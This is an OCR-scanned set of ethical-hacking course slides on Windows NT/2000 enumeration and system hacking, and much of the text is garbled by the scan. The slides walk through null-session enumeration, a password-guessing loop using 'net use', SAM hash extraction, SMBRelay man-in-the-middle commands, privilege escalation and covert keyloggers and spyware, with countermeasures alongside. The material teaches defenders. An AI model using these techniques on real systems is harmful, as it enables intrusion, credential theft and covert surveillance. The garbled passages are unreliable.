NetBIOS Name Table fo 



Host 192.168.2.4: 



USER 

UORKGROUP 
USER 

Adapter addre 



Uorkstation Se 
Domain Name 
Messenger Seru 



Table for Host 192.168.2.7: 



JCITR02 

RANGE2 

JCITR02 

JCITR02 

RnNGE2 

RANGE2 

0O_MSBROUSE_ 



Uorkstation Service 
Domain Name 
Messenger Service 
File Server Service 
Browser Service Elei 
Master Brouser 
Master Brouser 



NetBIOS Name Table fo 



St 192.168.2.24: 



COMPUTREl 
COMPUTREl 



Uorkstation Se 



cl-26-10-d4-2d 
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Hacking Tool: DumpSec 



DumpSec reveals shares over a null session with the target 
computer. 



==>rc=5 NetUserModalsGet(O) 
==>rc=5 NetUserModalsGet(3) 

==>Not authorized to uiew renaining policy infornation 

Replication 

==>rc=5 OpenSCManager 

System Path Components (in search order) 

HKEV_L0CflL_MftCHINE\SVSTEM\CurrentControlSet\Seruices\LanmanSeruer\Parame1 
HKEV_LOCflL_MftCHINE\SVSTEM\CurrentControlSet\Control\SecurePipeSeruers (si 
(key not present) 




File Edit Searcli Report View Help 



I Polici"e5 
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Hacking Tool: NAT 



0 The NetBIOS Audi ting Tool (NAT) is designed to 
explore the NetBI OS f i le-shari ng services offered by the 
target system. 

© 1 1 i mpl ements a stepwi se approach to gather 
i nf ornnati on and attempt to obtai n f i I e system- 1 evel 
access as though it were a legiti mate local cl ient. 

© If a NETBI OS session can be established at all via TCP 
port B9, the target is declared "vulnerable". 

© Once the session is fully set up, transactions are 
performed to col lect more i nformation about the server 
including any file system "shares" it offers. 
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© SN M P is si mple. M anagers send requests to agents, and 
the agents send bacl< rep! ies. 

©The requests and rep! i es refer to var i abl es accessi bl e to 
agent software. 

© |V| anagers can also send requests to set val ues for 
certain variables. 

© Traps let the manager know that something significant 
has happened at the agent's end of thi ngs: 

• a reboot 

• an interface failure, 

• or that something else that is potentially bad has happened. 

© E numerati ng NT users vi a SN M P protocol i s easy usi ng 
snmputil 



SNMPutil example 



^ C:\WINNT\System32\cmd.eKe 



C:\>snnputil get 210-212-69.129 public -1-3-6-1-2-1-1-2-0 

Uariable = system-sysObject ID-0 

Ualue = ObjectID 1.3.6.1.4.1.9.1.27 



C:\>snnputil getnext 210.212.69.129 public interfaces . if Number. 0 
Uariable = interfaces . if Table . if Entry . if Index. 1 
Ualue = Integer32 1 

C:\>snnputil getnext 210-212-69-129 public interfaces - if Table - if Entry- if Index-1 
Uariable = interfaces . if Table . if Entry . if Index. 2 
Ualue = Integer32 2 

C:\>snnputil getnext 210.212.69.129 public interfaces . if Table . if Entry . if Index. 2 
Uariable = interfaces - if Table - if Entry - if Index-3 
Ualue = Integer32 3 

C:\>snnputil getnext 210-212-69-129 public 0-0 
Uariable = system. sysDescr.0 

Ualue = String <0x43><0x69><0x73><0x63><0x6f ><0x20><0x49><0x6e><0x74><0x65><0 
x72 ><0x6e ><0x65 ><0x74><0x77><0x6f ><0x72 ><0x6b><0x20><0x4f ><0x70><0x65 ><0x72 ><0x6 
1X0x74X0x69 ><0x6e><0x67><0x20><0x53><0x79><0x73><0x74><0x65><0x6d><0x20><0x53> 
<0x6f X0x66X0x74X0x77X0x61X0x72X0x65X0x20X0x0dX0x0aX0x49X0x4f X0X53X0 
x20X0x28X0x74X0x6dX0x29X0x20X0x32X0x35X0x30X0x30X0x20X0x53X0x6f X0x6 
6 X0x74X0x77X0x61 X0x72 X0x65 X0x20X0x28 X0x43 X0x32 X0x35 X0x30X0x30X0x2d> 
<0x49X0x2dX0x4cX0x29X0x2cX0x20X0x56X0x65X0x72X0x73X0x69X0x6f X0x6eX0 
x20X0x31X0x31X0x2eX0x32X0x28X0x31X0x30X0x61X0x29X0x2cX0x20X0x52X0x4 
5 X0x4c X0x45 X0x41 X0x53 X0x45 X0x20X0x53 X0x4f X0x46 X0x54X0x57X0x41 X0x52 > 
<0x45X0x20X0x28X0x66X0x63X0x31X0x29X0x0dX0x0aX0x43X0x6f X0x70X0x79X0 
x72X0x69X0x67X0x68X0x74X0x20X0x28X0x63X0x29X0x20X0x31X0x39X0x38X0x3 
6X0x2dX0x31X0x39X0x39X0x37X0x20X0x62X0x79X0x20X0x63X0x69X0x73X0x63> 
<0x6f X0x20X0x53 X0x79 X0x73 X0x74X0x65 X0x6dX0x73 X 0x2 c X 0x2 0X0x49 X0x6e X0 
x63X0x2eX0x0dX0x0aX0x43X0x6f X0x6dX0x70X0x69X0x6cX0x65X0x64X0x20X0x5 
4X0x75 X0x65X0x20X0x30X0x32X0x2dX0x44X0x65X0x63X0x2dX0x39X0x37X0x20> 
<0x31X0x36X0x3aX0x30X0x32X0x20X0x62X0x79X0x20X0x63X0x6bX0x72X0x61X0 
x6cX0x69X0x6b> 
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0IP Network Browser [ 210.212.69.129 ] 
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□■■■4^ ZIO. ZIZ. 69. 129 : hdlr olS . vsnl . net . in 

: ^M=- Cxsco ZSll 

Community String: public 

□ WSSBKB^ 

4^JsYs^t^&mlJ3^: h^?tolS . vsnl . net . in^"" 
i Description:^J^.sco Internetxrork Operatini 
^ Contact- 



j^^^^lAll Location: 

sys Object ID 



.4.^.9 




1.3.6.1 

J Last Boot: ZO-Hay-03 2:33:13 P! 

Router (will forward IP packets 
Inter faces 
i^' 19 interfaces 
■# 1 EthernetO 

ether net Csmacd 
HV.r HTU: ISOO 
■^il' Speed: 10 Hbp^ 
B HAC Address!!^S)107E3AlAS0 



Software lOS (tm) 2S00 Sol?wai^^( C2S00-I-L ) , Versi- 



Yes 



Admin Status: enabled 
Operational Status: up 
Last change : 21-Jun-03 2:43:03 PH : Keepalive 
Performance Snapshot : 21-Jun-03 3:52:56 PH 
Input : 267 K bits/sec 



OK 



Input : 77 pkts/sec 
^'^^l "i^ Output : 323 E bits/sec 

Output : 211 pkts/sec 

E TCP/IP Addresses 

202.54.30.37 255.255.255 



192 



^ ^ 



Subnet Scan Completed 



SNMP Enumeration Countermeasures 



0 Si mpl est way to prevent such acti vi ty i s to remove the 
SN M P agent or turn off the SN M P service. 

0 If shutting off SNMP is not an option, then change the 
default 'public' community name. 

0 Implement the Group Policy security option called 
Additional restrictions for anonymous connections. 

0 Access to null session pi pes and null session shares, and 
I PSec filtering should also be restricted. 

Bl-Council 



Windows 2000 DNS Zone transfer 



© For clients to locate Win 2k domain services 
such as Ad and kerberos, Win 2k relies on DNS 
SRV records. 

© Simple zone transfer (nslookup, Is-d 
<domainname>) can enumerate lot of 
interesting network information. 

© An attacker would look at the foil owing records 
closely: 

• 1 G I obal Catal og Ser vi ce (_ gc._ tcp_ ) 

• 2. Domain Controllers (_ldap._tcp) 

• 3. Kerberos Authenticati on (_kerberos._tcp) 
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Blocking Win 2k 



You can easily block 
zone transfers using 
the DNS property 
sheet as shown here. 
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I dentifyi ng Accounts 



0 Two powerful NT/ 2000 enumeration tools are: 

• lsid2user 

• 2.user2sid 

© They can be downloaded at (www.chem.msu.su/ ^udnyi/ NT/ ) 

© These are command 1 1 ne tools that look up NT SI Ds from 
username input and vice versa. 



V C:\WINNT\System32\cmd.eKe 




-|n| ^\ 








D:\NDdule 4 - EnurieratiDn\sid>user2sid \\196.^^| 


^1 admin is t pat or 


S-1 -5-21-1123561945-1788223648-725345543-500 






iNunber of subauthorities is 5 
Donain is ETRUSTFIREUALL 
Length of SID in nenory is 28 bytes 
Type of SID is SidTypeUser 
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Hacking Tool: Enum 



© Availablefor download from http://razor.bindview.conn 

0 enunn is a console- based Win32 infornnation 
enumeration utility. 

© Using null sessions, enum can retrieve user lists, 
machine lists, share lists, name lists, group and 
membership lists, password and LSA policy 
information. 

© enum is also capable of rudimentary brute force 
dictionary attack on individual accounts. 
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Hacking tool: Userinfo 



0 Userinfo is a little function that retrieves all available 
information about any known user from any NT/ Win2k 
system that you can hit B9 on. 

© Speci fi cal I y calling the NetUserGetlnfo API call at Level 
3, Userinfo returns standard info like 

• SI D and Pri mary group 

• logon restrictions and snnart card requirements 

• special group infornnat ion 

• pw expi rati on i nformati on and pw age 

©This application works as a null user, even if the RA set 
to 1 to speci f i cal I y deny anonymous en u merati on . 
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Hacking Tool: GetAcct 



© GetAcct sidesteps "RestrictAnonynnous=l" and acquires 
account infornnation on Windows NT/ 2000 machines. 

0 Down loadable from (www.securityfriday.com) 



t J GetAcct 
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Get Account 



Domain/ Computer Name 
FUTURE 



User : Name 



Administrat 




SOI Cuest 



Built-in ac 



Built-in ac 




1000 



j aye sh 



Full name Comment Usr comment Passwor dl Pr iv I Primaj Op | Op | Op Account 

Odays Oh Guest S13 




normal 



j aye sh 



eiSdays 



Admin: 



S13 



normal 
normal 



2l 



Active Directory Enumeration 



© Al I the existi ng users and groups could be enumerated 
with a simple LDAP query. 

© Theonlything required to perform this enumeration is 
to create an authenticated session via LDAP. 

© Connect to any AD server using Idp.exe port 389 

© Authenticate yourself usi ng Guest / pr any domai n 
account 

© Now all the users and built in groups could be 
enumerated. 
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AD Enumeration countermeasures 



© H ow i s thi s possi bl e with a si mpl e guest account? 

© The Win 2kdcpronno installations screen prompts if the 
user wants to relax access permissions on the di rectory 
to allow legacy servers to perform lookup: 

IPermission compatible with pre-Win2k 

2. Permission compatible with only with Win2k 

© Choose option 2 during AD installation. 
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Summary 



0 Enumeration in vol ves active connections to systenns 
and directed queries. 

© The type of information enumerated by intruders 
includes network resources and shares, users and 
groups and applications and banners. 

©Null sessi ons are used often by crackers to connect to 
target systems. 

© NetBIOS and SN MP enumerations can be disguised 
using tools such as snmputil, natetc. 

© Tools such as user2sid, sid2user and userinfo can be 
used to identify vulnerable user accounts. 
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Ethical Hacking 



ModuleV 
System H acki ng 



Module Objective 



© U nderstand the f ol I owi ng 

• Remote password guessi ng 

• Eavesdropping 

• Denial of Service 

• Buffer overflows 

• Privilege escalation 

• Password cracking 

• keystroke loggers 

• sniffers 

• Remote control and backdoors 

• Port redirection 

• Covering tracks 

• Hidingfiles 
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Administrator Password Guessing 



© Assuming that NetBIOS TCP B9 port is open, the most 
effective method of breaking into NT/ 2000 is password 
guessi ng. 

© Attempting to connect to an enumerated share (I PC$, 
or C$) and trying user namo^ password. 

© Default Admi n$, C$, %Systemdri ve% shares are good 
starti ng poi nt. 
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Performing automated password 
guessi ng 



©Performing autonnated password guessing is easy-sinnple loop using 
the NT/ 2000 shell for connnnand based on the standard NET USE 
syntax. 

©1 Createasinnpleusernanneand password file. 
©2. Pipethisfileinto FOR connmand 
©C:\>FOR /F "token=l, 2*" %i in (credentials.txt) 
©do net use\\target\ I PC$ %i / u: %j 




7^ 

username password 
password administrator 

xycdf john 

babe_me i rebecca 

freak you / Rumsfield 



Bl-Council 



Tool: Legion 



Q Legion 



Help 

-Scan Tvpe- 



(* Scan Range 
C Scan List 





Scan 




Abort Scan 




Clear 



1 3 shares found on 4 remote hosts. 
^ Legion 

E--^ 1S2.1G8.20.8 

E I 192.168.20.102 

E M I 182.188.20.144 
182.168.20.170 



Show BF Tool 



Map Drive 



LEGION v2.1- 



-Scan Range- 
Enter Start IP 

Enter End IP 




\\182. 
\\182. 
\\182. 
\\182. 
\\182. 
\\182. 
\\182. 
\\182. 
\\182. 
\\182. 
\\182. 
\\182. 
\\182. 



168.20. 
168.20. 
168.20. 
168.20. 
168.20. 
168.20. 
168.20. 
168.20. 
168.20. 
168.20. 
168.20. 
168.20. 
168.20. 



8\SharedDocs 

102\SharedDocs 

144\SharedDocs 

170\CD Drive (G) 

170\SharedDocs 

170\C 

170\D 

1 70\usadata0 
1 70\usadata1 
1 70\usa_db 
170\E 
170\F 
1 70\usa 



Save Text 



© Legion automates the password guessing in NetBIOS 
sessions. Legion will scan multiple Class C I P address 
ranges for Windows shares and also offers a manual 
dictionary attack tool . 
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H acki ng tool : NTI nfoScan (now CI S) 



^ Cerberus Internet Scanner Results - Microsoft Internet EKplorer 






File Edit View Favorites Tools Help 




\- 


<^Back '-►"'31^' ^Search J] Favorites ^Media ^ | # 0 ' g ^ j 


Address |g C;\domloads\cerebus\Reports\192, 168,20, 102, html 


J ^i>Go 


Links 


» 


^^^^'^^ Registry checks on \\192.16S.20.102 

Reports 





Web Service 
MS SQL Service 
FTP Service 

NetBIOS 
NT Redstry 
NT Services 
SMTP Service 
FOB Service 
Portmapper 
Finger 



System Details 



Key; HELM\SYSTEM\CmTentControlSet\Control\SecureKpe Servers 

Value: 

The winreg key does not exist. The ACLs set on this key control who has network access to the 
registry. Create tins key and give administrators M control. This will ensure that only 
administrators have network access to the registry. 

Remote Access to the Regstry 

K ey: HKLM\S YS TEMCurrentC ontrolS et\S ervic e s\L amnanS erver\Parameters 

Value: Auto Share Server 

The automatic administrative shares (C$,D$, ADMINS, etc) are stiU created on this machine. Add 
this key and set the value to 0 to stop this. 



Key Permissions: Appid 



Cerberus Internet Scanner 




.jnjxi 


File Tools Help 


ri^ S ■ M ^1 ?| 


Host to Scan: 192.168.20.107 






Starting scan... 






Starting web service checks- 






Starting SQL service checks.. 






Starting ftp service checks... 


completed. 




Starting NetBIOS checks... 


completed. 




Starting NT Registry Checks.. 


completed. 




Starting NT Service Checks... 


completed. 




Starting smtp service checks... completed. 




Starting P0P3 service checks.. completed. 




Starting RPC checks- 


completed. 




Starting finger checks... 


completed. 




Starting DNS checks... 


completed. 




Starting Browser checks- 


completed. 





0 NTI nfoScan is a security scanner for NT 4.0 is a 
vul nerabi I ity scanner that produces an HTM L based 
report of security issues found on the target system and 
further information. 
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Password guessing Counter measures 



© Block access to TCP and UDP ports 135-139. 
© Disable bindings to Wins client on any adapter. 
© Use complex passwords 

© Log failed logon attempts in Event viewer - Security log 
full event 529 or 539 - Logon/ Logoff 
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Monitoring Event Viewer Logs 



© Logging is of no use if no one ever analyzes the logs 

© Visual Last fronn www.foundstone.conn formats the 
event logs visually 
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"i^VisualLast 
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Browse List for KRASH 
POLARIS 



M \\KRASH -f -u administrator -n 10 



M WKRASH -f -u administrator -from WPEGASUS -n 10 



\KRASH -f -from WPEGASUS -n 10 



RASH -s -from WPEGASUS -n 10 



strator -from WPEGASUS -n 10 



^WKRASH -s -nlO -iis 



Visual Search 



Search Options | Time Frame Options | Server List | 



- Logon Event 

^ Last Successful Logons 
C Last Failed Attempts 



- Logon Type 

(• Either Type Logon 
f Interactive Logons 
C Remote Logons 



m 



User Name 
[administrator 



Machine Name to Search 
pAKRASH 

Backup File Name - .evt 

I 

n Verbose Mode 

P' Search IIS Entries Only 

|~ Include NULL Logons 

Numb er of R ecords 

m 1 ^ 

Apply Search Now 



onnected From 
[WPEGASUS 



Search 



Cancel 



Connected From 



Logon Domain 
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Password Sniffing 



Password guessing is hard work. Why not just sniff 
credentials off the wi re as users log i n to a server and 
then replay them to gain access? 




hostl 





3. Wait for logins 


IjOginiJohn 
Password: 123 





host2 




hosts 



host4 



2. Install Sniffer 



l.Break-in 



4. Retrieve Logs 



Sniffer Logs: 

Login: John 
Password :i23 



Hacking Tool: LOphtcrack 



© LC4 is a password 
auditing and recovery 
package di stri buted by 
©stake software. SM B 
packet capture I i stens to 
the local network 
segment and captures 
individual login sessions. 

© With LOphtcrack 
password cracking 
engi ne anyone can sniff 
the ire for extended 
periods is most 
guaranteed to obtai n 
Administrator status in 
matter of days. 
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©stake LC4 - [UntittedZ] 



E)l8 Vim Import t't^non yelp 



^Adnfiinis(ra!;or 
(^cwyHjpal 
~ Guest 



.j^rcheyne 



I LM Passwdfd | <8 | NTlMPaiSwOfd [ LMHash 



02ASSB iaS30AS43 A AD38^3SeS 1 
ES3CAa74W9A224A3Bl08f3FA6CE6O 
E52CAC67419ft9fl224A:ai08F3FA6CE6O 
E52CAC67419A9A224A3B108F3FA6CB6O 
31 5B02R»71 21 D6F A AO^SSBS 1 404BE 



6D£lFAl3£e< f __ufl£dS_lfltal 



S346f7£AEEE 
3346F7EAEEe 
8316F7EAEEe 
DICCHA7740I 
ee46f7EAEE£ 
1B62D18F0DC 



Tho D ictkHMV Ciack tesli (of passwords that aie Ihe same as (he wofds feted in the 
WDf d fHe. This lesl hs ver^ fast and ^inds the weakest passwolds. 



DictkinaryySnile H^id Cf«k - 



pi ^ Chaiacters to piepend 
[2 ^ Characters to append 



P Comm&rt Setter subsiiljiiortE (much s3i>iwef) 
The Dictior>ai3^^iute Hybrid Dack tests for passwords th^ aie variations of Ihe words in 
the word file. It finfa passwoids such as "OanaSS' or "rmwk^". This test is last and 
fnit weak pas^wotds. 



Character Set 

I A - Z, 0 ■ 3 ! @tt$SS"t'0-_-i-'"[l{J|\;,^-<>,. ?/ 

L U.I. .11 11 j'-j-itcf Sc'l fliil each chararieff. 



>; Brute F.::.-ar,h9rsic-i. 



Ths B rule Fofce Ciaoktestsfwpasswordslhalaismadeupofths chsr«tei5 specif isd 
in Ihe Character Set. It finds passwords such as 'V/eRSpHfis" « "vC5^B9*-12b". This 
test is slow and Tnds mediuHii to strong passwads. S peoiy a cliaiacter set with imre 
cfteiacters to ciack strongef passwords. 
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H acki ng Tool : KerbCrack 



©KerbCrack consists of two programs, kerbsniff and 
kerbcrack. The sniffer listens on the network and captures 
Windows 2000/XP Kerberos logins. The cracker can be 
used to fi nd the passwords from the capture f i le usi ng a 
bruteforce attack or a dictionary attack. 



C:\WINNT\System32\cmd.eKe 






fx 


Microsoft Uindoiis 2000 [Uersion 5 


-00-2195] 




1 ^ 


<C> Copyright 1985-2000 Microsoft 


Corp- 







C : \ >ke r be r ac k 

KerbCrack 1-2 - <c> 2002, flrne Uidstron 

- http : //ntsecur it y - nu/too Ibox/kerbcrack/ 

Usage: kerbcrack <capture file> <crack riode> [dictionary; file] [password size] 

crack modes: 

-bl = brute force attack iiith <a-z, fl-Z> 

-b2 = brute force attack iiith <a-z, fl-Z, 0-9 > 

-b3 = brute force attack iiith <a-z, fl-Z, 0-9, special characters > 
-b4 = bl + Swedish letters 
-b5 = b2 + Swedish letters 
-b6 = b3 + Swedish letters 

-d = dictionary attack with specified dictionary file 
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Privilege Escalation 



© I f an attacker gai ns 
access to the network 
using non-admin user 
account, the next step 
is to gain higher 
pri vi I ege to that of an 
administrator. 

© This is called privilege 
escalation 
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Tool: GetAdmin 



© GetAdmin. exe is a small program that adds a user to the 
local administrators group. 

© It uses low- level NT kernel routine to set a globalflag 
al lowi ng access to any runni ng process. 

© You need to logon to the server console to execute the 
program. 

© The GetAdmin.exe is run from the command line or 
from a browser. 

© This only works with Nt 4.0 Service pack 3. 
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Tool: hk.exe 



© The hk.exe utility exposes a Local Procedure Call flaw in 
NT. 

0 A non-admin user can be escalated to administrators 
group using hk.exe 



c:\>net localgro^p administrators peter /add 
Access Denied 



o:\>hk net localgroup administrators peter /add 
Isass pid £ tid are: 47 -4B 
NtImperoanatBC3,i«i]CtO£fort suaoeeded 
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Manual Password Cracking Algorithm 



©Find a valid user 

©Create a I i st of possi bl e passwords 

© Ran !< the passwords from high probability to low 

©Key in each password 

© I f the system al I ows you i n - Success 

©Else try til I success 
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Automatic Password Cracking 
Algorithm 



©Find a valid user 

©Find encryption algorithm used 

©Obtain encrypted passwords 

©Create li st of possi bl e passwords 

©Encrypt each word 

©See if there is a match for each user I D 

©Repeat steps 1 through 6 




Password Types 



0 Passwords that contai n only letters. 

© Passwords that contai n only numbers. 

0 Passwords that contain only special characters. 

0 Passwords that contain letters and numbers. 

0 Passwords that contai n only letters and special 
characters. 

0 Passwords that contai n only special characters and 
numbers. 

0 Passwords that contain letters, special characters and 
numbers. 
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© Dictionary attack 

© Brute force attacl< 

© Hybrid attack 

© Social engineering 

© Shoulder surfing 

© Dumpster diving 



Cracking NT/ 2000 passwords 



© SAM fi le i n Wi ndows NT/ 2000 contai ns the usernames 
and encrypted passwords. The SAM file is located at 
%systennroot%\ systenn32\ conf i g di rectory 

© The file is locked when the OS is running. 

• Booti ng to an alternate OS 

- NTFSDOS (www.sysl nternals.com) will mount any NTFS 
partition as a logical drive. 

• Backup SAM from the Repai r di rectory 

- Whenever rdisk/s is run, a compressed copy of the SAM 
called SAM._ is created in %systemroot%\ repair. Expand 
this file using c:\ >expand sam._sam 

• Extract the hashes from the SAM 

- Use LOphtcrack to hash the passwords. 
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Redi recti ng SM B Logon to the 
Attacker 



©Eavesdropping on LM 
responses becomes much 
easier if the attacker can 
tr i cl< the vi cti m to attempt 
Windows authentication of 
the attacl<er's choice. 

© Basi c tr i ck i s to send an 
emai I message to the vi cti m 
with an embedded 
hyper! i nk to a fraudulent 
SM B server. 

©When the hyperlink is 
clicked, the user 
unwittingly sends his 
credentials over the 
network. 




An attacker cracks those hi 
LOphtcrack 



E-Mail Me 



H«lla John, 
eiick this link 



X I Connection established to 
fli the victim's pc using hashed credential 





Logon Credentials 



Username: 



Password: 'smtm 
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Hacking Tool: SMBRelay 



© SM BRel ay i s essenti al ly a SM B server that can capture 
usernames and password hashes from i ncomi ng SM B 
traff i c. 

© It can also perform man-in-the-middle(MITM) attacks. 

© You must disable NetB I OS over TCP/ 1 P and block ports 
B9 and 445. 

© Start the SM BRel ay server and I isten for SM B packets: 

• c:\>smbrelay/e 

• c:\>smbrelay/IL 2/IR 2 

© An attacker can access the cl i ent machi ne by si mply 
connecting to it via relay address using: c:\ > net use* 
\\<capture_ip>\c$ 
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SM BRday man- in-the- middle 
Scenario 




©The attacker i n this setti ng sets up a fraudulent server at 
192.168.234.251, a relay address of 192.168.234.252 using /R, and a 
target server address of 192.168.234.34 with /T. 

c:\ > smbrelay / 1 L 2 / 1 R / R 192.168.234.252 /T 192.168.234.34 

©When a victim client connects to the fraudulent server thinking it is 
tal ki ng to the target, M I TM server i ntercepts the cal I , hashes the 
password and passes the connection to the target server. 
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SM B Relay Weakness & 
Countermeasures 



© The problem is to convi nee 
a victim's client to 
authenti cate to the M I TM 
server 

0 You can send a malicious e- 
mai I message to the vi cti m 
client with an embedded 
hyper I i nk to the SM BRel ay 
server's I P address. 

0 Another solution is ARP 
Doi soni ng attack agai nst 
:he enti re segment causi ng 
al I of the systems on the 
segment to authenticate 
through the fraudulent 
MITM server 
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Countermeasures 

0 Configure Windows 
2000 to useSMB 
signing. 

0 Client and server 
communication will 
cause it to 

cryptograph i cal I y si gn 
each bfock of SM B 
communications. 

0 These settings are found 
under Security Policies 
/Security Options 



H acki ng Tool : SM B Gri nd 



SM BGri nd i ncreases the speed of LOphtcrack sessions on 
sniffer dumps by removing duplication and providing a 
faci I ity to target specific users without havi ng to edit the 
dump files manually. 



Untitled.lc - 5MB Grinder 



File View Help 



Duplicate Entries Removed: 0 



Username | NT Hash 



I LanMan Hash 



I Challenge ^ 



Administrator 

BillG 

foura 

fredc 

threea 

twoa 

Ready 



C7E 2622D 76D 3F001 CF08B 0753646. 
C04EB42B9F5B1 1 4CS6921 C41 63AE. 
FA5664S75FFADF0AF61ABF9B097F. 
S0030E 356D 1 5FB 1 942772D CFD 7D . . 
E241 06942BF38BCF57A6A4B2901 6., 
C5663434F963B E 79C8FD 99F535E 7. , 



73CC402BD3E791 756C3D3B81 7E02.. 
5ECD9236D21 095CE7584248B8D2... 
D CF9CAA6D B C2F2D FAAD 3B 435B 5. . . 
3466C2B0487FE39A41 7EAF50CFAC... 
1 C3A2B 6D 939A1 021 AAD 3B 435B 51 . . . 
89D 42A44E 771 4aAAAAD 3B 435B 51 . . . 



"ScleROSIE 
'YokoHamc 
"aaaa" 
"crackpot" 
"aaa" 

y" .... ,ld 

I I ^ 
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Hacking Tool: SMBDie 



© SMBDie tool crashes computers running Windows 
2000/ XP/ NT by sending specially crafted SMB request. 



SMBdie vO.l 




What is SMBdie? 

It's a proof of concept tool. 

Is it possible to crash Windows computers by 

sending a specially crafted SMB request. 

What computers are vulnerable ? 

Windows NT/2k/XP/.NET RC1 with NETBIOS 

enabled. 

Author 

zamolx3@personal.ro 



Computer (IP address) 



|1 92.1 68.20.1 09 




1 m 11 


NETBIOS name 








Close 1 


IMAHYCO -SERVER 




Status 





Call to arms - Information anarchy 

http: //www, nmrc. orq/l nf oAnarch^j/l nf oAnarch^J. htm 



Connecting to remote computer ... (port 133) 

Connected. 

Session established. 

Protocol negotiated. 

NULL session established. 

Operating System : Windows 2000 

Connected to IPCS. 

Sending exploit ... 

Done. 
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H acki ng Tool : NBTDeputy 



© N BTDeputy register a NetBI OS computer name on the 
networkand is ready to respond to NetBT name-query 
requests. 

© N BTdeputy he! ps to resolve I P address from N etBI OS 
computer name. It's similar to Proxy AR P. 

© This tool works well with SMBRelay. 

© For example, SM B Relay runs on a computer as 
ANONYMOUS-ONE and the I P address is 192.168.110 
and NBTDeputy is also ran and 192.168.110 is specified. 
SM B Relay may connect to any XP or .N ET server when 
the logon users access "My Network Places" 

Bl-Council 



NeBIOS DoS Attack 



0 Sending a 'NetBI OS Name Release' message to the 
NetBIOS Name Service (NBNS, UDP B7) on a target 
NT/ 2000 machi ne forces it to place its name 1 n confl ict 
so that the system wi 1 1 no longer wi 1 1 be able to use it. 

© This will block the client from participating in the 
NetBIOS network. 

© Tool: nbname 

• NBNamecan disableentire LANs and prevent machines from 
rejoining them. 

• Nodes on a NetBIOS networl< infected by the tool will think that 
thei r names al ready are bei ng used by other machi nes. 
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H acki ng Tool : J ohn the Ri pper 



© It is a command line tool designed to crack both Unix 
and NT passwords. J ohn is extremely fast and free 

© The resuiti ng passwords are case i nsensiti ve and may 
not represent the real mixed- case password. 
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What is LanManager Hash? 



Example: Lets say your password is: '123456qwerty' 

© When this password is encrypted with LIV| algorithm, it is first 
converted to all uppercase: '1234560WERTY' 

© The password is padded with null (blank) characters to make it 14 
character length: '1234560WERTY_' 

© Before encrypti ng this password, 14 character stri ng is spl it i nto 
half: '1234560 and WERTY_' 

© Each string is individually encrypted and the results concatenated. 

© '1234560' =6BF11E04AFAB197F 

'WERTY_' =F1E9FFDCC75575B15 

© The hash is6BFllE04AFAB197FFlE9FFDCC75575B15 

Note: The first half of the hash contains alpha-numeric characters and 
it wi 1 1 take 24 hrs to crack by LOphtcrack and second half only 
takes 60 seconds. 
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Password Cracki ng Countermeasures 



© Enforce 7-12 character 
alpha- numeric 
passwords. 

© Set the password change 
policy to 30 days. 

© Physically isolate and 
protect the server. 

© UseSYSKEY utility to 
store hashes on disk. 

© Monitor the server logs 
for brute force attacks on 
user accounts. 
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Keystroke Loggers 



0 1 f al I other attempts to 
sniff out domain privileges 
fail, then keystroke logger is 
the solution. 

©Keystroke loggers are 
stealth software that sits 
between keyboard 
hardware and the operati ng 
system, so that they can 
record every key stroke. 

©There are two types of 
keystroke loggers: 

• 1 Software based and 

• 2. Hardware based. 
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View Log Options 



■ Select configuration - 



Normal 



Normal 
with special 
keys 



Full detail 
report 



OnliJ 
letters 



-What to view? 

P' Normal characters (A..z. Space, Enter) 
|~ S^iecial keys [F1 ..F1 2, Shift, Alt, arrow keys, etc] 
R Backspaces (marked as "<") 
R Titles of active window 
|~ Window time 

P' Periodic time stamps [time logged every few minutes) 



Save options 



Cancel 



View log now 



Help 



View the log- 
C On 



Start on C AJI 





^1 n Februarj^ 2003 




■>■ 


Sun Mon Tue Wed Thu 


Fri 


Sat 


26 27 2S 29 30 


31 


1 


2 3 4 5 6 


7 


8 


& 10 11 13 


14 


15 


16 17 18 19 20 


21 


22 


23 24 25 26 27 


28 


1 


2 3 4 5 6 


7 


8 


Q Today: 12 2^)3 







Start on 2003-2-9 



^Anti-kevlogger 



r 



Status 




JUjU,-|eMllUU!£&''' 



Anti-keylogger is now scanning for keystroke 
monitoring programs currently running on your 
system. 




This could take a few minutes. Please be patient. 



[ Cancel ] 
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Spy ware: Spector (www.spector.com) 



©Spector is a spy ware and it wi II record everythi ng anyone does on 
the internet. 

©Spector automatically takes hundreds of snapshots every hour, very 
much I ike a surveillance camera. With spector, you will beabletosee 
exactly what your surveillance targets have been doing online and 
offline. 

©Spector works by taking a snapshot of whatever is on your computer 
screen and saves it away in a hidden location on your computer's hard 
drive. 



•3 Spector Toolbar Screen Shot - Microsoft Internet Explorer 



Close This Wifidow 



] Expert Prinii fit View 



■ l*i 






"tt 1*1 


1 Fwt\ 


Beck 




Fgrwsrd Latl 




Everts 



Hacking Tool: eBlaster (www.spector.conn) 



©eBlaster lets you know 
EXACTLY what your 
survei 1 1 ance targets are 
doi ng on the i nternet even 
if you are thousands of 
nnilesaway. 

©eBlaster records thei r 
emails, chats, instant 
messages, websites visited 
and keystrokes typed and 
then automatically sends 
this recorded information 
to your own email address. 

©Withi n seconds of them 
sendi ng or recei vi ng an 
email, you wi I receive your 
own copy of that emai I . 



I eBlaster 3.0 



eBlas 

Control Pane 



Options Reports 




Help 



0 






Acosss 




R&CGrd 


^\ Wli«ite 


/|\ Al#rts 
Si/ Sffhjp 



[-Report Delivery - 
Un r Off 



-Send Email' Report To - 



Report Format 

HTML r PlairiTewt 



Report Sending Interval- 



^ Send Every [sO ^ Minutes 
Schedule 



T 0 ■ eblaster^yahoo. com 
CD j 
BCC F 



r Dnce.adayat j 2:44:59 PM 



-Email Identification (Optional) 



From eBlaster - Johns Laptop 



Sybject eBlaster Activity Report 



■ I nactiviti^ T imeotjt 

pS ^ Minutes 



■Delivery Method 

T 

via SpectorSoft Server 
C via Custom Server ■ Options 



Uninstall ^ ^Test Email 



Save 



Cancel 
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I KS Software Keylogger 



VI Datview - Binary Log Translator for IKS 



■ Filters- 



^1 Itff 11^ H Ih? nw vn riff Iha^ rriM^ b« pirsp^ m ihv g^iTg^j g r tfk^ 

1^ fib kt dat c-^ bie laumt la d y^Li dwf . 4^ ' 

in the mcn^o^ed c;oii¥>Ufi i 



Filter Out Arrovo Keys! 
p Filter Out Ctrl and Alt Keys 
p Filter Out F1 to F1 2 Keys 
r Filter Out AJI Other Function Keys 



r Viewer- 

(* Use Notepad 

C Translate to Text Onlv 



- Clear Log^ 

r~ Clear Binary Log Upon Exit 

|7 Clear Text Log Upon Exit 



Import Binary Log From: 



jc: \winnt\iks.dat 
